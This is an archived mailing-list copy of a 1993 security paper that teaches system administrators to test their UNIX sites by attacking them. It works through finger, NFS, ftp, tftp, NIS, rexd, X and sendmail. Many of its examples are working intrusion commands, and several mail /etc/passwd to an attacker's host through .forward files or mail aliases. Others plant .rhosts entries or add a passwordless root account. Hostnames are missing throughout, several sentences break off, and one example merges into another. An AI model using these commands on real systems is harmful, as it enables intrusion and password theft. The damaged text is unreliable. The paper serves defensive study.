System Administrator's Guide to Cracking

archived information

Return to UNIX Security in a Network Environment page.

From Firewalls-Owner@GreatCircle.COM Wed Dec  1 21:14:38 1993
Received: from by with smtp
	(Smail3.1.28.1 #8) id m0p56NC-00030Wa; Wed, 1 Dec 93 21:14 PST
Received: by (/\==/\ Smail3.1.25.1 #25.2)
	id ; Wed, 1 Dec 93 21:14 PST
Received: from mycroft.GreatCircle.COM by relay1.UU.NET with SMTP 
	(5.61/UUNET-internet-primary) id AA25173; Thu, 2 Dec 93 00:05:03 -0500
Received: by mycroft.GreatCircle.COM (4.1/SMI-4.1/Brent-931103)
	id AA01177; Thu, 2 Dec 93 05:02:50 GMT
Received: from Sun.COM by mycroft.GreatCircle.COM (4.1/SMI-4.1/Brent-931103)
	id AA00987; Wed, 1 Dec 93 19:45:08 PST
Received: from Corp.Sun.COM (lemay.Corp.Sun.COM) by Sun.COM (4.1/SMI-4.1)
	id AA13219; Wed, 1 Dec 93 19:45:42 PST
Received: from by Corp.Sun.COM (4.1/elliemay (corpmail1 inbound))
	id AA00222; Wed, 1 Dec 93 19:45:40 PST
Received: by (4.1/SMI-4.1)
	id AA01803; Wed, 1 Dec 93 19:48:46 PST
To: firewalls@GreatCircle.COM
Subject: system administrators guide to cracking
Date: Wed, 01 Dec 93 19:48:45 -0800
From: Dan 
Sender: Firewalls-Owner@GreatCircle.COM
Precedence: bulk
Status: RO

(Posted to various newsgroups as well; of firewall interest.)


_Improving the Security of Your Site by Breaking Into it_

    Dan Farmer              Wietse Venema
    Sun Microsystems        Eindhoven University of Technology   


Every day, all over the world, computer networks and hosts are being
broken into.  The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in.  Less is known about the latter
types of break-ins, because by their very nature they are much harder to


CERT.  SRI.  The Nic.  NCSC.  RSA.  NASA.  MIT.  Uunet.  Berkeley.
Purdue.  Sun.  You name it, we've seen it broken into.  Anything that is
on the Internet (and many that isn't) seems to be fairly easy game.  Are
these targets unusual?  What happened?

Fade to...

A young boy, with greasy blonde hair, sitting in a dark room.  The room
is illuminated only by the luminescense of the C64's 40 character
screen.  Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list.  "guest -- guest", "root -- root", and "system -- manager" all
fail.  No matter.  He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...

This seems to be the popular image of a system cracker.  Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system.  However, there is a far more dangerous type
of system cracker out there.  One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs.  One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities.  A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail.  The uebercracker is here.


Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man.  The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems.  An uebercracker is not usually motivated to perform random
acts of violence.  Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality.  An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.


In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one.  We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks.  While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate.  By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not.  We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host.  Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit.  The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.

We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems.  The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like.  Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.

There are four main parts to the paper.  The first part is the
introduction and overview.  The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security.  This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.)  It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific.  Defensive strategies against each of the various
attacks are also covered here.

The third section deals with trust: how the security of one system
depends on the integrity of other systems.  Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator
may take to protect her or his system.  Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.

Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.)  Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services.  This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions.  It then can either
report on this data or use an expert system to further investigate any
potential security problems.  While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites.  It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.

Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper.  Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking.  The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files.  In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems.  Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords).  Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack

Gaining Information

Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations.  In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site ( to give you an account on one of her machines so that
you can look at your own system's security from the outside.

What should you do?  First, try to gather information about your
(target) host.  There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points.  But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find.  There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of.  Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended

To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):

 victim % finger
 Login       Name             TTY Idle     When    Where
 zen      Dr.  Fubar           co   1d  Wed 08:00

Good!  A single idle user -- it is likely that no one will notice if you
actually manage to break in.

Now you try more tactics.  As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information.  What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.

Trying these commands on reveals the following information,
presented in a compressed tabular form to save space:

 Login   Home-dir    Shell      Last login, from where
 -----   --------    -----      ----------------------
 root    /           /bin/sh    Fri Nov 5 07:42 on ttyp1 from
 bin     /bin                   Never logged in
 nobody  /                      Tue Jun 15 08:57 on ttyp2 from
 daemon  /                      Tue Mar 23 12:14 on ttyp0 from
 sync    /           /bin/sync  Tue Mar 23 12:14 on ttyp0 from
 zen     /home/zen   /bin/bash  On since Wed Nov  6 on ttyp3 from
 sam     /home/sam   /bin/csh   Wed Nov  5 05:33 on ttyp3 from
 guest   /export/foo /bin/sh    Never logged in
 ftp     /home/ftp              Never logged in

Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target.  However,
much of this information is useful only when used in conjunction with
other data.

For instance, running showmount on your target reveals:

 evil % showmount -e
 export list for
 /export                            (everyone)
 /var                               (everyone)
 /usr                               easy
 /export/exec/kvm/sun4c.sunos.4.1.3 easy
 /export/root/easy                  easy
 /export/swap/easy                  easy

Note that /export/foo is exported to the world; also note that this is
user guest's home directory.  Time for your first break-in!  In this
case, you'll mount the home directory of user "guest."  Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file.  As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.

 evil # mount /foo
 evil # cd /foo
 evil # ls -lag
 total 3
    1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
    1 drwx--x--x  9 10001    daemon       1024 Aug  3 15:49 guest
 evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
 evil # ls -lag
 total 3
    1 drwxr-xr-x 11 root     daemon        512 Jun 19 09:47 .
    1 drwxr-xr-x  7 root     wheel         512 Jul 19  1991 ..
    1 drwx--x--x  9 guest    daemon       1024 Aug  3 15:49 guest
 evil # su guest
 evil % echo >> guest/.rhosts
 evil % rlogin
	 Welcome to!
 victim %

If, instead of home directories, were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.

We suggest that filesystems be exported:

o   Read/write only to specific, trusted clients.
o   Read-only, where possible (data or programs can often be
    exported in this manner.)

If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password.  And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:

 evil % whoami
 evil % rsh csh -i
 Warning: no access to tty; thus no job control in this shell...
 victim %  ls -ldg /etc
 drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
 victim %  cd /etc
 victim %  mv passwd pw.old
 victim %  (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
 victim % ^D
 evil % rlogin -l toor
	 Welcome to!
 victim #

A few notes about the method used above; "rsh csh -i" is used
to initially get onto the system because it doesn't leave any traces in
the wtmp or utmp system auditing files, making the rsh invisible for
finger and who.  The remote shell isn't attached to a pseudo-terminal,
however, so that screen-oriented programs such as pagers and editors
will fail -- but it is very handy for brief exploration.

The COPS security auditing tool (see appendix D) will report key files
or directories that are writable to accounts other than the
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
file permission problems. On many systems, rsh probes as shown above,
even when successful, would remain completely unnoticed; the tcp wrapper
(appendix D), which logs incoming connections, can help to expose such


What now?  Have you uncovered all the holes on your target system?  Not
by a long shot.  Going back to the finger results on your target, you
notice that it has an "ftp" account, which usually means that anonymous
ftp is enabled.  Anonymous ftp can be an easy way to get access, as it
is often misconfigured.  For example, the target may have a complete
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
instead of a stripped down version.  In this example, though, you see
that the latter doesn't seem to be true (how can you tell without
actually examining the file?)  However, the home directory of ftp on is writable.  This allows you to remotely execute a command
-- in this case, mailing the password file back to yourself -- by the
simple method of creating a .forward file that executes a command when
mail is sent to the ftp account. This is the same mechanism of piping
mail to a program that the "vacation" program uses to automatically
reply to mail messages.

 evil % cat forward_sucker_file
 "|/bin/mail  ls -lga
 200 PORT command successful.
 150 ASCII data connection for /bin/ls (,1129) (0 bytes).
 total 5
 drwxr-xr-x  4 101      1             512 Jun 20  1991 .
 drwxr-xr-x  4 101      1             512 Jun 20  1991 ..
 drwxr-xr-x  2 0        1             512 Jun 20  1991 bin
 drwxr-xr-x  2 0        1             512 Jun 20  1991 etc
 drwxr-xr-x  3 101      1             512 Aug 22  1991 pub
 226 ASCII Transfer complete.
 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
 ftp> put forward_sucker_file .forward
 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
 ftp> quit
 evil % echo test | mail

Now you simply wait for the password file to be sent back to you.

The security auditing tool COPS will check your anonymous ftp setup; see
the man page for ftpd, the documentation/code for COPS, or CERT advisory
93:10 for information on how to set up anonymous ftp correctly.
Vulnerabilities in ftp are often a matter of incorrect ownership or
permissions of key files or directories. At the very least, make sure
that ~ftp and all "system" directories and files below ~ftp are owned by
root and are not writable by any user.

While looking at ftp, you can check for an older bug that was once
widely exploited:

 % ftp -n
 ftp> open
 Connected to
 220 FTP server ready.
 ftp> quote user ftp
 331 Guest login ok, send ident as password.
 ftp> quote cwd ~root
 530 Please login with USER and PASS.
 ftp> quote pass ftp
 230 Guest login ok, access restrictions apply.
 ftp> ls -al / (or whatever)

If this works, you now are logged in as root, and able to modify the
password file, or whatever you desire.  If your system exhibits this
bug, you should definitely get an update to your ftpd daemon, either
from your vendor or (via anon ftp) from

The wuarchive ftpd, a popular replacement ftp daemon put out by the
Washington University in Saint Louis, had almost the same problem.  If
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
more recent version.

Finally, there is a program vaguely similar to ftp -- tftp, or the
trivial file transfer program.  This daemon doesn't require any password
for authentication; if a host provides tftp without restricting the
access (usually via some secure flag set in the inetd.conf file), an
attacker can read and write files anywhere on the system. In the
example, you get the remote password file and place it in your local
/tmp directory:

 evil % tftp
 tftp> connect
 tftp> get /etc/passwd /tmp/passwd.victim
 tftp> quit

For security's sake, tftp should not be run; if tftp is necessary, use
the secure option/flag to restrict access to a directory that has no
valuable information, or run it under the control of a chroot wrapper


If none of the previous methods have worked, it is time to go on to more
drastic measures.  You have a friend in rpcinfo, another very handy
program, sometimes even more useful than finger.  Many hosts run RPC
services that can be exploited; rpcinfo can talk to the portmapper and
show you the way.  It can tell you if the host is running NIS, if it is
a NIS server or slave, if a diskless workstation is around, if it is
running NFS, any of the info services (rusersd, rstatd, etc.), or any
other unusual programs (auditing or security related).  For instance,
going back to our sample target:

 evil % rpcinfo -p    [output trimmed for brevity's sake]
    program vers proto   port
     100004    2   tcp    673  ypserv
     100005    1   udp    721  mountd
     100003    2   udp   2049  nfs
     100026    1   udp    733  bootparam
     100017    1   tcp   1274  rexd

In this case, you can see several significant facts about our target;
first of which is that it is an NIS server.  It is perhaps not widely
known, but once you know the NIS domainname of a server, you can get any
of its NIS maps by a simple rpc query, even when you are outside the
subnet served by the NIS server (for example, using the YPX program that
can be found in the comp.sources.misc archives on  In
addition, very much like easily guessed passwords, many systems use
easily guessed NIS domainnames.  Trying to guess the NIS domainname is
often very fruitful. Good candidates are the fully and partially
qualified hostname (e.g.  "victim" and ""), the organization
name, netgroup names in "showmount" output, and so on.  If you wanted to
guess that the domainname was "victim", you could type:

 evil % ypwhich -d victim
 Domain victim not bound.

This was an unsuccessful attempt; if you had guessed correctly it would
have returned with the host name of's NIS server.  However,
note from the NFS section that is exporting the "/var"
directory to the world.  All that is needed is to mount this directory
and look in the "yp" subdirectory -- among other things you will see
another subdirectory that contains the domainname of the target.

 evil # mount /foo
 evil # cd /foo
 evil # /bin/ls -alg /foo/yp
 total 17
    1 drwxr-sr-x  4 root     staff         512 Jul 12 14:22 .
    1 drwxr-sr-x 11 root     staff         512 Jun 29 10:54 ..
   11 -rwxr-xr-x  1 root     staff       10993 Apr 22 11:56 Makefile
    1 drwxr-sr-x  2 root     staff         512 Apr 22 11:20 binding
    2 drwxr-sr-x  2 root     staff        1536 Jul 12 14:22 foo_bar

In this case, "foo_bar" is the NIS domain name.

In addition, the NIS maps often contain a good list of user/employee
names as well as internal host lists, not to mention passwords for

Appendix C details the results of a case study on NIS password files.


You note that the rpcinfo output also showed that runs rexd.
Like the rsh daemon, rexd processes requests of the form "please execute
this command as that user". Unlike rshd, however, rexd does not care if
the client host is in the hosts.equiv or .rhost files. Normally the rexd
client program is the "on" command, but it only takes a short C program
to send arbitrary client host and userid information to the rexd server;
rexd will happily execute the command.  For these reasons, running rexd
is similar to having no passwords at all: all security is in the client,
not in the server where it should be. Rexd security can be improved
somewhat by using secure RPC.


While looking at the output from rpcinfo, you observe that
also seems to be a server for diskless workstations. This is evidenced
by the presence of the bootparam service, which provides information to
the diskless clients for booting.  If you ask nicely, using
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
its NIS domainname.  This can be very useful when combined with the fact
that you can get arbitrary NIS maps (such as the password file) when you
know the NIS domainname.  Here is a sample code snippet to do just that
(bootparam is part of SATAN.)

    char   *server;
    struct bp_whoami_arg arg;           /* query */
    struct bp_whoami_res res;           /* reply */
    /* initializations omitted... */
            xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);

    printf("%s has nisdomain %s\n", server, res.domain_name);

The showmount output indicated that "easy" is a diskless client of, so we use its client address in the BOOTPARAMPROC_WHOAMI

 evil % bootparam has nisdomain foo_bar


NIS masters control the mail aliases for the NIS domain in question.
Just like local mail alias files, you can create a mail alias that will
execute commands when mail is sent to it (a once popular example of this
is the "decode" alias which uudecodes mail files sent to it.)  For
instance, here you create an alias "foo", which mails the password file
back to by simply mailing any message to it:

 nis-master # echo 'foo: "| mail > /etc/aliases
 nis-master # cd /var/yp
 nis-master # make aliases
 nis-master # echo test | mail -v

Hopefully attackers won't have control of your NIS master host, but even
more hopefully the lesson is clear -- NIS is normally insecure, but if
an attacker has control of your NIS master, then s/he effectively has
control of the client hosts (e.g. can execute arbitrary commands).

There aren't many effective defenses against NIS attacks; it is an
insecure service that has almost no authentication between clients and
servers.  To make things worse, it seems fairly clear that arbitrary
maps can be forced onto even master servers (e.g., it is possible to
treat an NIS server as a client). This, obviously, would subvert the
entire schema.  If it is absolutely necessary to use NIS, choosing a
hard to guess domainname can help slightly, but if you run diskless
clients that are exposed to potential attackers then it is trivial for
an attacker to defeat this simple step by using the bootparam trick to
get the domainname.  If NIS is used to propagate the password maps, then
shadow passwords do not give additional protection because the shadow
map is still accessible to any attacker that has root on an attacking
host.  Better is to use NIS as little as possible, or to at least
realize that the maps can be subject to perusal by potentially hostile

Secure RPC goes a long way to diminish the threat, but it has its own
problems, primarily in that it is difficult to administer, but also in
that the cryptographic methods used within are not very strong.  It has
been rumored that NIS+, Sun's new network information service, fixes
some of these problems, but until now it has been limited to running on
Suns, and thus far has not lived up to the promise of the design.
Finally, using packet filtering (at the very least port 111) or
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
all can help.


The portmapper only knows about RPC services.  Other network services
can be located with a brute-force method that connects to all network
ports.  Many network utilities and windowing systems listen to specific
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
usually on port 6000, etc.)  SATAN includes a program that scans the
ports of a remote hosts and reports on its findings; if you run it
against our target, you see:

 evil % tcpmap
 port 21: ftp
 port 23: telnet
 port 25: smtp
 port 37: time
 port 79: finger
 port 512: exec
 port 513: login
 port 514: shell
 port 515: printer
 port 6000: (X)

This suggests that is running X windows.  If not protected
properly (via the magic cookie or xhost mechanisms), window displays can
be captured or watched, user keystrokes may be stolen, programs executed
remotely, etc.  Also, if the target is running X and accepts a telnet to
port 6000, that can be used for a denial of service attack, as the
target's windowing system will often "freeze up" for a short period of
time.  One method to determine the vulnerability of an X server is to
connect to it via the XOpenDisplay() function; if the function returns
NULL then you cannot access the victim's display (opendisplay is part of

    char   *hostname;

    if (XOpenDisplay(hostname) == NULL) {
       printf("Cannot open display: %s\n", hostname);
    } else {
       printf("Can open display: %s\n", hostname);

 evil % opendisplay
 Cannot open display:

X terminals, though much less powerful than a complete UNIX system, can
have their own security problems.  Many X terminals permit unrestricted
rsh access, allowing you to start X client programs in the victim's
terminal with the output appearing on your own screen:

 evil % xhost
 evil % rsh telnet -display

In any case, give as much thought to your window security as your
filesystem and network utilities, for it can compromise your system as
surely as a "+" in your hosts.equiv or a passwordless (root) account.


Next, you examine sendmail.  Sendmail is a very complex program that has
a long history of security problems, including the infamous "wiz"
command (hopefully long since disabled on all machines).  You can often
determine the OS, sometimes down to the version number, of the target,
by looking at the version number returned by sendmail.  This, in turn,
can give you hints as to how vulnerable it might be to any of the
numerous bugs.  In addition, you can see if they run the "decode" alias,
which has its own set of problems:

 evil % telnet 25
 connecting to host (, port 25
 connection open
 220 Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
 expn decode

Running the "decode" alias is a security risk -- it allows potential
attackers to overwrite any file that is writable by the owner of that
alias -- often daemon, but potentially any user.  Consider this piece of
mail -- this will place "" in user zen's .rhosts file if it is

 evil % echo "" | uuencode /home/zen/.rhosts | mail

If no home directories are known or writable, an interesting variation
of this is to create a bogus /etc/aliases.pag file that contains an
alias with a command you wish to execute on your target.  This may work
since on many systems the aliases.pag and aliases.dir files, which
control the system's mail aliases, are writable to the world.

 evil % cat decode
 bin: "| cat /etc/passwd | mail"
 evil % newaliases -oQ/tmp -oA`pwd`/decode
 evil % uuencode decode.pag /etc/aliases.pag | mail
 evil % /usr/lib/sendmail -fbin -om -oi